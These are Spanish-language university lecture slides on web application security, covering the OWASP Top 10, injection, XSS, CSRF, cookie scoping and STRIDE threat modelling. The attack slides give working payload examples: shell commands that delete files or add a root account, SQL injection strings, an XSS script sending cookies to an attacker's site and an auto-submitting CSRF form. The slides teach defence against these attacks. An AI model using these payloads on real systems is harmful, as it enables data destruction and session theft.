Seguridad en Aplicaciones web

Tamaño: px
Comenzar la demostración a partir de la página:

Download "Seguridad en Aplicaciones web"

Transcripción

1 Seguridad en Aplicaciones web Cristian Cappo Núcleo de Investigación y Desarrollo Tecnológico Facultad Politécnica Universidad Nacional de Asunción, PY Setiembre/2014 Movilidad Docente Asociación de Universidades del Grupo Montevideo (AUGM)

2 Contenido I. Seguridad: Introducción II. Aplicaciones web. Características III. Vulnerabilidades y ataques en web. IV. Principios de diseño de seguridad V. Seguridad en el ciclo de vida una aplicación web

3 I - Seguridad: introducción

4 Qué es un sistema seguro? Qué es un software seguro? 4

5 Definiciones sobre sistema seguro Un sistema es seguro si se comporta precisamente en la manera esperada y de ninguna otra forma más. Definición vaga y abstracta, cuenta poco sobre como alcanzar esta seguridad. 5

6 Definiciones sobre sistema seguro(2) Un sistema es seguro si y solo si este comienza en un estado seguro y no puede pasar a un estado inseguro. No hay forma de definir un comportamiento deseable para un sistema suficientemente complejo. Los deseos muchas veces no son automáticamente mapeables a restricciones formales o concretas. El comportamiento de un sistema es muy difícil de analizar conclusivamente (Alan Turing: El problema de la indecibilidad ) 6

7 Un sistema seguro Aquel que esta construido en base a políticas de seguridad. Una política de seguridad es una sentencia de que es y que no es permitido. Estas políticas definen los métodos, herramientas y procedimientos que hacen cumplir la política. Una especificación de políticas de seguridad de acciones puede comprender mecanismos de prevención, detección o recuperación ante ataques. 7

8 Componentes de la seguridad de la Confidencialidad: previene el uso o descubierta no autorizada de información (la oculta) La privacidad es un concepto Asociado. El control de acceso soporta este componente información Integridad: salvaguarda la precisión y completitud de la Información y del método de procesamiento. Se refiere a la confianza en los datos y recursos. Incluye: integridad de datos e integridad del origen (autenticación) Disponibilidad: asegura que los usuarios autorizados accedan en tiempo y forma a los datos y recursos. El ataque de denegación de servicio compromete este componente 8

9 II - Aplicaciones web. Características 9

10 Qué es una aplicación web? Es aquella aplicación que utilizan la infraestructura web para su funcionamiento, en particular consideramos la que utiliza el protocolo HTTP (HyperText Transfer Protocol - RFC 2616) para la comunicación con sus usuarios. La web se ha convertido en el medio natural para desplegar servicios de software. Existen actualmente cerca de 785 millones de sitios web según Netcraft ( (a nov/2013), en el mismo mes del 2012 se tenía 625 millones, es decir hubo un crecimiento de más de 150 millones de sitios en un solo año!! Y con 34,3% de la población mundial con acceso a Internet (2400 millones de personas!!) Cuántos de estos sitios poseen al menos una aplicación web?

11 Beneficios de las aplicaciones web Utiliza un protocolo liviano(http) y stateless (sin conexión) El front-end es algo común en cualquier computadora o dispositivo móvil: un navegador. Los navegadores poseen mucha funcionalidad La tecnología y los lenguajes de desarrollo de las aplicaciones son relativamente simples y fáciles de conseguir.

12 Estan día a día con nosotros

13 Funcionalidades de la aplicaciones web(2) Además de Internet, las organizaciones están adoptando este esquema para soporte de sus actividades de negocio: Aplicaciones para manejo administrativo: ejemplo software ERP. Administración de infraestructura como servidores, estaciones de trabajo, máquinas virtuales, mail & web servers, etc. Software colaborativo: workflow, documentos, etc. Aplicaciones usuales de oficina (planilla, proc. de texto, etc): Google apps, MS Office live, etc.

14 Arquitectura web Esquema básico Firewall Cliente Web Servidor Web App - Web App - Web Servidor de Base de datos Tráfico HTTP Puerto 80

15 Arquitectura web Funcionamiento Todas las transacciones HTTP siguen el mismo formato. Cada request(cliente) y cada response(servidor) tiene tres partes: la línea del request (que indica el método HTTP) o response, la cabecera y el cuerpo

16 Arquitectura web Componentes Métodos HTTP: los principales GET y POST. Otros: HEAD, TRACE, OPTIONS, DELETE. URL (uniform resource locator): identificador único para un recurso web. El formato es el siguiente: protocol: //hostname[:port]/[path/]file?[param=value] Envío de parámetros: en el URL query string, en los cookies, en el cuerpo usando POST. Las aplicaciones pueden ser construidas con una variedad de tecnologías: Lenguajes de scripts como: PHP, VBScript, Perl, etc Plataformas de aplicaciones web : APS.NET, Java, Ruby on rails, Web servers: Apache, Nginx, IIS, Google, Oracle, IBM, etc Base de datos: Oracle, PostgreSQL, MySQL, etc Otros componentes de back-end: sistema de archivos, servicios web, servicios de directorio, etc.

17 Arquitectura web Métodos HTTP básicos Método Descripción Body? GET Solicitar un documento del servidor No HEAD Solicitar solo el header del servidor No POST Enviar datos al servidor para su procesamiento Si PUT Guardar el cuerpo del request en el servidor Si TRACE Mostrar la traza del mensaje a través de los proxys al server OPTIONS Determina que métodos están habilitados en el servidor No DELETE Borra un documento del servidor No No

18 Arquitectura web Funcionalidad del lado cliente HTML4 y HTML5 HyperLinks Forms CSS JavaScript VBScript DOM Ajax JSON Extensiones al browser: Java applets, controles ActiveX, objetos Flash, objetos Silverlight, etc. Etc..

19 Arquitectura web otras cuestiones Estado y Sesiones Esquemas de codificación (ejemplo del carácter = ) URL %3d Unicode %u003d ó \u003d HTML = ó = ó &eq; Base64 PQ== Hex 3D Acceso remoto de clientes y serialización Adobe Flex y AMF (Action Message Format) MS Silverligth and WCF (Windows Communication Foundation) Objetos java serializados

20 III - Vulnerabilidades y ataques en web

21 Qué es una vulnerabilidad? Es una debilidad o fallo de seguridad en el software que puede ser aprovechada o explotada de forma malintencionada por un atacante y violar así la seguridad del sistema, ó afectar su disponibilidad.

22 Porqué las aplicaciones quedan vulnerables? Falta de aplicación de una metodología que incluya a la seguridad como parte del proceso de desarrollo de software. Software Development Lifecycle SDL (Microsoft) SSE-CMM(ISO/IEC 21827) (SystemSecurityEngineering- CMM) SAMM (Software Assurance Maturity Model (OWASP) Software Security Framework (Citigal & Fortify )

23 Porqué las aplicaciones quedan vulnerables? (2) Conciencia sobre seguridad poco desarrollada. Desarrollo con ajustadas restricciones de tiempo y recursos. Rápida evolución de las amenazas. Creciente demanda de nuevas funcionalidades. Ajuste de las aplicaciones en funcionamiento (o en etapas finales de desarrollo) a las nuevas tecnologías. Desarrollo personalizado. La simplicidad engañosa de las herramientas.

24 Ejemplo de vulnerabilidades de una aplicación CMS popular Aplicación: Joomla! ( Fuente: (Secunia) Número de vulnerabilidades para Joomla! ( ): : : : 236 Common Vulnerabilities 2009: 66 and Exposures (CVE) Fuente : cve.mitre.org Desde 1999 a 2012, más Número de vulnerabilidades para Joomla! ( ): : : : : : : 67 del 50% corresponde a vulnerabilidades web Otras fuentes de consulta de vulnerabilidades: (Symantec) osvdb.org (Open Source Vulnerability Database) ( SecurityGlobal.net) (Web Hacking Incident Database) (exclusivo de aplicaciones web) xssed.com (Vulnerabilidades XSS) (lista un poco más de vulnerabilidades XSS)

25 Cómo evitar las vulnerabilidades? Hacer lo correcto desde el principio Pero No es posible 100% de seguridad Muchas veces utilizamos software de terceros, del que tal vez desconozcamos su calidad. Tenemos que convivir con sistemas en funcionamiento Si es posible mejorar el software, debe hacerse! Es probable que tengamos que aumentar la seguridad desde el exterior

26 Razones para atacar una aplicación web Ubicuidad Existencia de técnicas simples de hackeo Anonimato Pasar por alto las protecciones tradicionales (firewalls) Facilidad de código propio Seguridad inmadura Constantes cambios a las aplicaciones Dinero

27 Qué componentes son atacables? Plataforma web Aplicación web Base de datos Cliente web Comunicación Disponibilidad (DoS)

28 Ataques web Firewall Cliente Web Servidor Web App - Web App - Web Servidor de Base de datos Tráfico HTTP Puerto 80 GET /login.pl?user= El firewall no puede contrarrestar ataques que vienen en el contenido de los paquetes HTTP (que es puerto abierto)

29 Vulnerabilidades en web Open Web Application Security Project (OWASP) Organización sin fines de lucro que se dedica a ayudar a entender y mejorar la seguridad de las aplicaciones y servicios web. Entre uno de sus proyectos se encuentra la producción de la lista de las diez vulnerabilidades más importantes de las aplicaciones web. El último reporte es del 2013.

30 1. Inyección (notablemente SQL Injection). 2. Pérdida de autenticación y gestión de sesiones. 3. Secuencia de Comandos en Sitios Cruzados (XSS). 4. Referencia Directa Insegura a objetos. 5. Configuración de Seguridad Incorrecta. 6. Exposición de datos sensibles (incluye almacenamiento criptográfico inseguro) 7. Ausencia de control de acceso a funciones (incluye falla de restricción de acceso a URL de 2010) 8. Falsificación de Petición de Sitios Cruzados (CSRF). 9. Uso de componentes con vulnerabilidades conocidas (nuevo 2013) 10. Redirecciones y reenvíos no validados. OWASP Falla de restricción de acceso a URL de Almacenamiento criptográfico inseguro - Defectuosa configuración de seguridad

31 Ejemplos de vulnerabilidades y ataques usuales en web 31

32 Vulnerabilidades Fuente: IBM X-Force, % 59% Web app vulns Other vulns 32

33 Dos lados de la seguridad web Aplicaciones Web (server-side) Ventas online, bancos, blogs, Google Apps Mezcla de código de servidor y cliente Codigo en server escrito en PHP, Ruby, ASP, JSP se ejecuta en el servidor web. Código cliente escrito en JavaScript y otros, se ejecuta en el navegador. Muchos potenciales bugs: XSS, CSRF, SQL injection Navegador Web (client-side) Responsable de confinar en forma segura el contenido web presentado por los sitios visitados. 33

34 Server-side Se ejecuta en un servidor web (app server) Toma la entrada de los usuarios remotos vía el navegador. Interactúa con base de datos y otros servidores. Prepara la salida para los usuarios. 34

35 Ejemplo: PHP (Hypertext Processor) Lenguaje scripting con sintaxis al estilo C Puede intercalar HTML estático y código <input value = <?php echo $myvalor; $>> Puede incrustar variables de cadenas con comillas dobles: $usuario= Mundo ;echo Hola $usuario! ; o $usuario= Mundo;echo Hola. $usuario.. ; Datos de formularios en arreglos globales _$GET, $POST,.. 35

36 Inyección de código en PHP Calculadora server-side en PHP: $in = $_GET[ val ]; eval( $op1=. $in. ; ); Entrada benigna Entrada maliciosa rm *.* ) Calc.php ejecuta: eval( $op1=5; system( rm *.* ); ); 36

37 Mas inyección de código en PHP Código PHP para enviar mail $ = $_POST[ ] $subject = $_POST[ subject ] system( mail $ s $subject < /tmp/texto ) Código atacante =hacker@hackerhome.net& subject=foo < /usr/passwd; ls =hacker@hackerhome.net&subject=foo; echo evil::0:0:root:/:/bin/sh">>/etc/passwd; ls 37

38 SQL Típica generación de código usando SQL $selecteduser = $_GET['user']; $sql = "SELECT Username, Clave FROM users ". "WHERE Username='$selecteduser'"; $rs = $db->executequery($sql); Que pasa si user es una cadena maliciosa que cambia el significado de la consulta? 38

39 Típico login 39

40 Navegador (Cliente) Ingrese Usuario & Password Servidor web SELECT passwd FROM USERS WHERE uname = $user DB 40

41 Login normal Navegador (Cliente) Ingrese Usuario & Password Servidor web SELECT passwd FROM USERS WHERE uname = smith DB 41

42 Entrada maliciosa 42

43 Inyección SQL (SQLI) Navegador (Cliente) Ingrese Usuario & Password Servidor web SELECT passwd FROM USERS WHERE uname = ; DROP TABLE USERS;-- DB 43

44 Inyección SQL Idea básica Servidor víctima Atacante 1 3 Recibe datos desde la DB 2 Consulta No esperada Esta es una vulnerabilidad de validación de entrada La entrada de usuario no sanitizada cambia el sentido original de la consulta SQL. Es un caso especial de inyección de código DBMS Víctima 44

45 Autenticación con la BD set UserFound=execute( SELECT * FROM UserTable WHERE username= & form( user ) & AND password= & form( pwd ) & ); El usuario ingresa su código y contraseña, este SQL chequea si existe tal combinación en la BD. If not UserFound.EOF Autenticación correcta else Autenticación incorrecta 45

46 Usando SQLI para ingresar El usuario ingresa OR 1=1 -- El aplicación web ejecuta la consulta set UserFound=execute( SELECT * FROM UserTable WHERE username= OR 1=1 -- ); Ahora todos los registros son retornados y la autenticación es correcta 46

47 Más de SQLI El usuario puede dar como código exec cmdshell net user badguy badpwd / ADD Y se ejecuta la consulta: set UserFound=execute( SELECT * FROM UserTable WHERE username= exec -- ); Crea una cuenta para badguy en el servidor de base de datos. 47

48 SQLI de segundo orden Los datos guardados en la BD pueden ser utilizados luego para un SQLI Por ejemplo, un usuario cambia su nombre a admin -- Esta vulnerabilidad puede existir si no se aplica consistentemente la validación de entrada y el escapado (por ejemplo de convertir a \ ) Algunas aplicaciones solo validan la entradas del servidor web y no así las entradas que vienen de la BD. UPDATE users set password = jejeje where uname = admin - - Tratar a todas las entradas como peligrosas 48

49 Previniendo los SQLI Validar toda la entrada Filtrar cualquier carácter que tenga un significado especial Chequear el tipo de dato Caracteres permitidos (whitelist) Colocar solo los no permitidos a veces no funciona Se puede olvidar algunos Puede prevenir entradas válidas (por ejemplo O Higgins) Permita solo un conjunto bien definido de valores seguros Puede utilizar expresiones regulares. 49

50 Escapando Caracteres especiales como provee distinción entre datos y código en la consulta Para entradas válidas con, use caracteres escapados. Diferentes BD tienen diferentes reglas de escapado: Ejemplos escape(o Higging) = O\ Higging escape(o Higging) = O Higging 50

51 Sentencias SQL precompiladas En un SQLI los datos son interpretados como código Variables bind : garantiza que los lugares en la consulta sean datos (no código) Sentencias prepared: permiten la creación de consultas estáticas con variables bind. Preserva la estructura de la consulta prevista. 51

52 Ejemplo de sentencias prepared /* Ejemplo en Java */ PreparedStatement ps = db.preparestatement("select pizza, toppings, quantity, order_day " + "FROM orders WHERE userid=? AND order_month=? "); ps.setint(1, session.getcurrentuserid()); ps.setint(2, Integer.parseInt(request.getParamenter("month"))); ResultSet res = ps.executequery(); Variables bind (data placeholder) La consulta es parseada sin los parámetros Las variables bind tienen tipos (int, string, ) De todos modos debe seguir cuidando los SQLI de segundo orden. 52

53 Cuestiones del lado cliente Cliente-side

54 Metas de la seguridad web Navegar en forma segura en la web Un sitio malicioso no puede robar información o modificar sitios legítimos o dañar al usuario. Aún si es visitado concurrentemente en un sitio legítimo, en una ventana separada, o aun en un iframe de la misma página. Soportar aplicaciones web seguras Las aplicaciones entregadas sobre la web deben tener las mismas propiedades de seguridad que requiere cualquier aplicación standalone. Cuáles son estas propiedades? (veremos más adelante) 54

55 Modelos de amenazas Web Atacante Web Atacante de la red Pasivo: espiando la conexión wireless Activo: router malicioso WiFi, envenenamiento DNS Atacante en Malware Código malicioso se ejecuta directamente en la computadora de la víctima Infecta la máquina, puede aprovechar bugs en software (ej: buffer overflow) o convencer al usuario a instalar contenido maliciosos. Como? Enmascarándose como un programa de antivirus, un video códec, etc. 55

56 Atacante web Controla un sitio malicioso (attacker.com) Puede inclusive obtener un certificado SSL/TLS para este sitio por casi nada. Usuario visita attacker.com (porqué) Correo pishing, contenido tentador, resultado de búsquedas, puesto por una propaganda, golpe de suerte.. App de atacantes en Facebook u otro El atacante no tiene otro acceso a la computadora del usuario Variación: atacante iframe Un iframe con contenido malicioso incluido en un sitio legal (propaganda, mashups, etc) 56

57 S.O. vs. Navegador - analogía Sistema Operativo Primitivas Llamadas al sistema (Sys Calls) Procesos Disco Principal: Usuarios Control de acceso discrecional Vulnerabilidades Buffer overflow Root exploit Navegador Primitivas DOM - Document object model Frames Cookies y localstorage Principal: Origen Control de acceso mandatorio Vulnerabilidades XSS Universal Cross-Site scripting (UXSS) 57

58 Same Origin Policy Same Origin Policy (SOP) para DOM: A puede acceder al DOM de B si A y B tienen el mismo (protocol, domain, port) Same Origin Policy (SOP) para cookies: Generalmente, basado en ([protocol], domain, path) protocol://domain:port/path?params opcional 58

59 Document Object Model (DOM) La página HTML es un dato estructurado DOM: representación orientada a objeto de una representación jerárquica de la estructura HTML Propiedades: document.alinkcolor, document.url, document.forms[ ], document.links[ ], Métodos: document.write(document.referrer) Cambian el contenido de la página!! También como Browser Object Model (BOM) Window, Document, Frames[], History, Location, Navigator (tipo y versión del navegador) 59

60 Ejemplo de ataques comunes Secuencia de Comandos en Sitios Cruzados (XSS) La aplicación puede ser utilizada como mecanismo para transportar un ataque al usuario final con un navegador. El navegador del usuario no tiene forma de conocer que el script es malicioso Puede acceder a cookies, tokens de sesión o cualquier otra información sensible guardada en el navegador. Pueden ser de tipo reflejado, permanente o de DOM

61 XSS - Ejemplo Considerar el siguiente código Java (String) page += "<input name='creditcard' type='text value='" + request.getparameter("cc") + "'>"; El atacante puede modificar el parámetro CC en el navegador '><script>document.location=' m/cgi-bin/cookie.cgi? foo='+document.cookie</script>'.

62 Secuencia de Comandos en Sitios Cruzados (XSS) Reflejado - Ejemplo Usuario hace login El usuario solicita el URL malicioso al servidor El server responde con el script del atacante El atacante secuestra la sesión del usuario El script del atacante Se ejecuta en el navegador Del usuario El atacante envía un URL malicioso al usuario El navegador del usuario envía el dato al atacante 62

63 Secuencia de Comandos en Sitios Cruzados (XSS) Guardado - Ejemplo Usuario hace login El atacante envía una respuesta conteniendo un script malicioso El usuario ve la respuesta del atacante El server responde con el script del atacante El atacante secuestra la sesión del usuario El script del atacante Se ejecuta en el navegador Del usuario 5 6 El navegador del usuario envía el dato al atacante 63

64 XSS (un poco más) Web 2.0 ` 1. HTTP GET 2. HTML and JS 3. Asynchronous GET 4. Javascript to wrap in eval Los scripts maliciosos pueden estar Contenidos en argumentos de JavaScript creados dinámicamente. Contenido en los arreglos JavaScript Escritos dinámicamente en el DOM 64

65 XSS en AJAX Flujos en arreglos Javascript var downstreamarray = new Array(); downstreamarray[0] = 42"; dobadstuff(); var bar= ajacked"; No detectado por filtros simples No existe <>, script, on.., etc Solo se necesita romper la doble comilla 65

66 XSS en AJAX Código JSON escrito en el DOM por un script del lado cliente var inboundjson = {"people": [ {"name": "Joel", "address": <script>badstuff();</script>", "phone": "911"} ] }; someobject.innerhtml(inboundjson.people[0].address); // Vulnerable document.write(inboundjson.people[0].address); // Vulnerable someobject.innertext(inboundjson.people[0].address); // Seguro XSS puede estar en el DOM document.url, documento.location, document.referer 66

67 Protegerse contra XSS Asegurar que su aplicación valide todas las cabeceras, cookies, query string, campos de formulario y campos ocultos No intentar identificar contenido activos y removerlos, filtrarlos o sanitizarlos. Existen demasiados tipos de contenido activo y muchísimas formas de codificarlo para sobrepasar los filtros. Es recomendable utilizar una política de seguridad positiva que especifica que es lo que está permitido. La política de seguridad negativa (mantenimiento de firmas) son difíciles de mantener y usualmente incompletas. 67

68 Prevenir XSS Cualquier entrada del usuario debe ser preprocesada antes de utilizarla dentro de HTML Remover /codificar los caracteres especiales HTML Usar una buena librería de escape Ejemplo: OWASP ESAPI En PHP, htmlspecialchars(string) puede reemplazar todos los caracteres con sus códigos HTML se convierte a &#039; se convierte a " & se convierte a & En ASP.NET, Server.HtmlEncode(string) 68

69 Seteando Cookies por el Servidor Nav. if expires=null: Es solo de la sesión GET HTTP Header: Set-cookie: NAME=VALUE; domain = (cuando enviar); path = (cuando enviar); secure = (solo sobre HTTPS); expires = (cuando expira); HttpOnly Serv. ámbito Borrar cookie seteando expires a una fecha pasada Ámbito por defecto es el dominio y path del URL actual Usos de cookies: autenticación, personalización, trazabilidad. 69

70 Identificación de Cookies Cookies son identificados por (name, domain, path) cookie 1 name = userid value = test domain = login.site.com path = / secure cookie 2 name = userid value = test123 domain =.site.com path = / secure Cookies distintos Ambos cookies guardados en el jar del browser y ambos en el ámbito login.site.com 70

71 domain: cualquier sufijo del URL-hostname, excepto el top-level domain (TLD) SOP para escribir Cookies Cuál cookie puede ser cambiado por login.site.com? Dominios permitidos login.site.com.site.com.com login.site.com puede cambiar cookies para todo.site.com pero no para otro sitio o TLD path: cualquiera Dominios no permitidos user.site.com othersite.com 71

72 SOP para enviar Cookies Nav. GET //URL-domain/URL-path Cookie: NAME = VALUE Serv. El navegador envia todos los cookies en el ámbito URL: cookie-domain es el dominio sufijo del URL-domain cookie-path es el prefijo del URL-path protocol=https si el cookie es secure Meta: el servidor solo puede ver cookies en su ámbito 72

73 Cuestiones en el protocolo de Cookies Qué conoce el servidor acerca de los cookies enviados por el browser? Solo ve Cookie: Name=Value y no los atributos (ejemplo, secure ) y no cuál dominio seteo el cookie RFC 2109 (cookie RFC) tiene la opción de incluir dominio y path, pero no es soportado por todos los navegadores 73

74 Como cambio el Cookie? Alice ingresa a login.site.com login.site.com setea el cookie de la session-id para.site.com Alice visita evil.site.com Sobreescribe.site.com session-id cookie con session-id del usuario test - no es una violación de SOP! (porqué?) Alice visita algo.site.com para enviar un trabajo algo.site.com piensa que esta hablando con test Problema: algo.site.com espera el session-id de login.site.com, no puede saber que el session-id cookie ha sido sobreescrito por un dominio hermano 74

75 Sobreescriendo Cookies seguros Alice accede a LSID, GAUSR son Cookies seguros Alice visita Automaticamente, debido a el filtro de phishing Un atacante de red puede inyectar la respuesta Set-Cookie: LSID=badguy; secure El navegador piensa que el cookie viene de permitiéndole sobreescribir el cookie seguro 75

76 Accediendo a Cookies via DOM La misma regla de ámbito de dominio como para enviar cookies al servidor. document.cookie retorna una cadena con todas las cookies disponibles por el documento Utilizada a veces en JavaScript para personalizar la página Javascript puede setear y borrar cookies via DOM document.cookie = name=value; expires= ; document.cookie = name=; expires= Thu, 01-Jan-70 76

77 XSRF (CSRF) Cross-site request forgery (Falsificación de petición en sitios cruzados) Sitios web maliciosos obligan al navegador del usuario a enviar una petición a un sitio web víctima con las credenciales del usuario. 77

78 CSRF Ejemplo: Un usuario ingresa a bank.com, olvida salir de su sesión. El usuario visita un sitio malicioso conteniendo <form name=formpago action= <input name=recipiente value=badguy> <script> document.formpago.submit(); </script> El navegador envía la cookie con la requisición maliciosa De esta forma: la autenticación con cookies no es suficiente cuando ocurre este tipo de efecto colateral. 78

79 CRSF - Falsificación de Petición en Sitios Cruzados Usuario hace login a una aplicación 1 El navegador envía requisición del atacante El usuario visita una página del atacante que tiene un CRSF Recibe página maliciosa 79

80 El servidor responde e incluye un cookie 80

81 El atacante ha inyectado un iframe 81

82 Recomendaciones para evitar CRSF Login Validación estricta del campo Referer: Usar HTTPS, en este tipo de conexión el Referer no es usualmente suprimido Utilizar correctamente tokens de validación (no debe poder ser obtenido por el atacante, por ejemplo via XSS). 82

83 III - Principios de diseño de seguridad 83

84 Principios de diseño de seguridad (PDS) * Son generales, aplicados a cualquier software 1) Diseño abierto 2) Seguro a fallas, por defecto 3) Privilegios mínimos 4) Economía de mecanismo 5) Separación de privilegios 6) Mediación completa 7) Mecanismo común mínimo 8) Aceptabilidad psicológica *Saltzer & Schoroeder. The protection of information in Computer Systems. CACM

85 PDS (2) 1) Diseño abierto/público (Open Design) Sugiere que la complejidad no agrega seguridad Definición: la seguridad de un mecanismo no debería depender del secreto de su diseño o implementación. El término seguridad por oscuridad captura el concepto. Ejemplo: El sistema CSS (Content Scrambling System) es un algoritmo criptográfico que protege a los DVDs de copias no autorizadas. Aunque el algoritmo se mantuvo oculto, en 1999 se descubrió el algoritmo, se publicó y se rompió. 85

86 PDS (3) 2) Seguro ante fallas, por defecto Restringe como los privilegios son inicializados cuando un sujeto u objeto es creado. Definición: un privilegio a un sujeto debe ser dado explícitamente sobre un objeto, de lo contrario se debe denegar el acceso al mismo. El acceso por defecto es ninguno Ejemplo: Si un servidor de mail no puede crear el directorio de spool, éste debe cerrar la conexión, emitir un mensaje de error y parar. No debe tratar de guardar el mensaje o expandir sus privilegios para guardar el mensaje en otro lugar, esto daría lugar a un atacante para sobrescribir o alzar nuevos archivos o llenando el disco (ataque DoS). 86

87 PDS (4) 3) Privilegios mínimos Indica como los privilegios son otorgados Definición: un sujeto debe tener solo los privilegios necesarios a fin de completar su tarea. Si alguien no necesita de un privilegio, no lo debe tener. Ejemplo 1: En Unix al usuario root no se le aplica control de acceso, tiene privilegio a todo. Ejemplo 2: un mail server que acepta conexiones de internet y copia los mensajes al directorio spool. Solo necesita acceso al puerto de red, crear los archivos y modificarlos. Debe renunciar a sus derechos sobre el archivo tan pronto como termina su tarea. Este no debe poder leer luego los archivos de usuarios. 87

88 PDS (5) 4) Economía en los mecanismos Enfatiza que el diseño e implementación de los mecanismos de seguridad deben ser simples. Definición: los mecanismos de seguridad deben ser tan simples como se pueda. Si los mecanismos son simples, existe menos posibilidades de error. 88

89 PDS (6) 5) Separación de privilegios Limita el acceso a las entidades del sistema Definición: un sistema no debe otorgar permisos basados en una simple decisión. Sistemas y programas deben dar acceso a recursos solo cuando mas de una condición es cumplida. Ejemplo: En Berkeley-Unixs, los usuarios no pueden cambiarse a la cuenta root a no ser que se den dos situaciones. La primera es que conozca la contraseña de root y la segunda que se encuentre en el grupo wheel. 89

90 PDS (7) 6) Mediación completa Este principio restringe la información en caché. Definición: requiere que todos los accesos a los objetos sean chequeados para asegurar que ellos son permitidos. Ejemplo: El DNS guarda información en el caché de los nombres de hosts con sus direcciones IP. Si un atacante envenena el caché implantando registros asociados a un IP falso con un nombre válido, un host puede enrutar conexiones a otro host incorrectamente. 90

91 PDS (8) 7) Mecanismo común mínimo Es restrictivo ya que limita el compartir Definición: los mecanismos para acceso a recursos no deben ser compartidos. Compartir recursos provee un canal por el cual la información puede ser transmitida, por lo que debe minimizarse el compartir. Ejemplo: un sitio web provee servicio de comercio electrónico a una compañía. Los atacantes quieren privar a esa compañía de sus ganancias, así que inundan el sitio con mensajes obstruyendo el servicio de comercio electrónico haciendo que los usuarios legítimos no puedan accederlo. En este caso el compartir Internet con el sitio de los atacantes causan que el ataque sea exitoso. 91

92 PDS (9) 8) Aceptabilidad psicológica Se reconoce el elemento humano en la seguridad informática. Definición: los mecanismos de seguridad no deben hacer mas dificultoso el acceso a un recurso que cuando éstos no estén presentes. Configurar y ejecutar un programa debe ser fácil e intuitivo tanto como sea posible, y la salida debe ser clara, directa y útil. Ejemplo: el programa ssh permite al usuario configurar el mecanismo de clave pública para cifrar la comunicación. Si se guarda la clave pública, se permite la conexión sin proveer la contraseña pero se mantiene la conexión cifrada. 92

93 IV - Seguridad en el ciclo de vida una aplicación web 93

94 Seguridad en el ciclo de vida de un software El diseño, construcción y despliegue de una aplicación debe integrar seguridad en todo su ciclo de vida. Algunas metodologías para desarrollo de software seguro: McGraw s Touchpoint BSIMM Building Security in Maturity Model Microsoft SDL OpenSAMM (Software Assurance Maturity Model) Security considerations in the SDLC NIST ( orientado a incluir seguridad en el ciclo de vida de desarrollo de software) 94

95 Metodología SDL (Security Devolopment lifecycle) Desarrollada por Microsoft Mandatorio en MS desde

96 Como integrar Seguridad al ciclo de vida de un software (un ejemplo basado en SDL) 96

97 Actividades de seguridad en el ciclo de vida de una aplicación 97

98 a) Objetivos de seguridad (Etapa de desarrollo: Requerimiento y análisis) 98

99 Descubriendo los objetivos de seguridad Matriz de roles Derivar de los requerimientos funcionales 99

100 Matriz de roles Ejemplo 100

101 Derivar de los requerimientos funcionales Ejemplo 101

102 B) Diseño seguro Directrices para el diseño seguro (Etapa de desarrollo: Arquitectura y diseño) Consisten en un conjunto de prácticas que pueden ser empleados para reducir el riesgo de vulnerabilidades de seguridad. Cada directriz debe ser: Accionable Asociada a una vulnerabilidad a ser mitigada Relevante Asociada a una vulnerabilidad que es conocida afecta a aplicaciones reales. De impacto Debe representar una decisión de ingeniería que tenga un impacto amplio. 102

103 Marco de seguridad Es una modelo de información-patrón que define un conjunto de aspectos de seguridad para la aplicación que se está diseñando. Las guías de patrones y prácticas incluyen un marco de seguridad específico por cada tipo de aplicación. 103

104 Categoría de vulnerabilidades común en muchos tipos de aplicaciones 104

105 Directrices específicas para una aplicación específica Directrices de diseño para aplicación web 105

106 Consideraciones de despliegue 106

107 c) Modelado de amenazas (Etapa de desarrollo: Requerimiento y análisis) Software security es construir software seguro que funcione como es esperado a través de todo su ciclo de vida. (Diferente a security software ) El modelado de amenazas es parte integral del ciclo de desarrollo seguro de una aplicación. Cuando desarrolla o actualiza un sistema, debe considerar cómo un intruso puede atacarlo y cómo construir las defensas apropiadas en los estadios de diseño e implementación del mismo. 107

108 Modelado de amenazas Existen muchos abordajes No existe una forma bien establecida para medirla calidad de un modelo de amenazas. Aun en el campo más maduro, como por ejemplo el de criptografía, muchos algoritmos/programas populares aun no han probado ser seguros (HeartBleed bug de OpenSSL - CVE ). 108

109 Modelado de amenazas Es una técnica de ingeniería que se utiliza para identificar amenazas, ataques, vulnerabilidades y contramedidas Ayuda a: Reconocer los objetivos de seguridad Amenazas relevantes Vulnerabilidades y contramedidas Es realizado para identificar cuando y donde se requieren más recursos para reducir los riesgos. Se realiza usualmente en la fase de diseño de un sistema y se retroalimenta de otras fases. 109

110 Modelado de amenazas proceso iterativo 110

111 Modelado de amenazas en el ciclo de vida de un SW En el modelo SDL de MS 111

112 Utilizando STRIDE Amenaza Spoofing Falsificación de identidad Tampering Modificación de dato o código Repudiation Negar que se ha realizado una acción Information disclosure Exponer información no autorizada a verla Denial of service Denegar o degradar el servicio a los usuarios Elevation of privilege Ganar capacidades sin la debida autorización Componente de seguridad Autenticación Integridad No Repudio Confidencialidad Disponibilidad Autorización 112

113 Modelado de amenazas Forma parte del SDL (Security Development Lifecycle) En el modelo de amenazas utilizando STRIDE, se descompone el sistema en componentes relevantes, se analiza cada componente por susceptibilidad a las amenazas y se mitiga las mismas. Este proceso se repite hasta que uno se encuentre confortable con las amenazas que restan. Si hace esto puede argumentar que su sistema es seguro. 113

114 El proceso de modelado con STRIDE 114

115 El proceso de modelado con STRIDE Diagrama: se utiliza DFD (Data Flow Diagram Diagrama de Flujo de Datos) aunque se puede utilizar cualquier otro para representar el diseño del sistema. 115

116 Elementos del DFD 116

117 DFD Puede hacerse en varios niveles Diagrama de contexto. Alto nivel, el producto/sistema completo Nivel 1 Alto nivel con los principales componentes Nivel 2 Bajo nivel con detalle de subcomponentes Nivel 3 Mucho más detallado, solo para grandes proyectos 117

118 Ejemplo (diagrama de contexto) 118

119 Ejemplo (Diagrama de nivel 1) 119

120 DFD Análisis o Síntesis TopDown Comienza del contexto Se focaliza en el sistema como un todo Bottom up Se conoce en detalle las características Se comienza desde abajo Abordaje no es conveniente para la síntesis 120

121 Reglas básicas Los datos no aparecen mágicamente, los datos vienen de un DataStore o de una entidad externa. Los datos no mueren en un DataStore, se indica un DataStore por alguna razón. Los datos no fluyen mágicamente entre los DataStores, debe existir un proceso entre ellos. No reensamble de diagrama de clases o grafos de llamadas. 121

122 Amenazas por cada elemento del sistema (Identificando amenazas) 122

123 Mitigación: algunas mitigaciones estándar 123

124 Validación Validar todo el modelo Coincide con el código final? Son todas las amenazas enumeradas? Mínimo: STRIDE de cada elemento que toca la línea de confianza Esta cada amenaza mitigada? Son las mitigaciones correctas? Validar la información capturada Qué otro código utiliza? Que funciones de seguridad esta en otro código? Esta seguro? 124

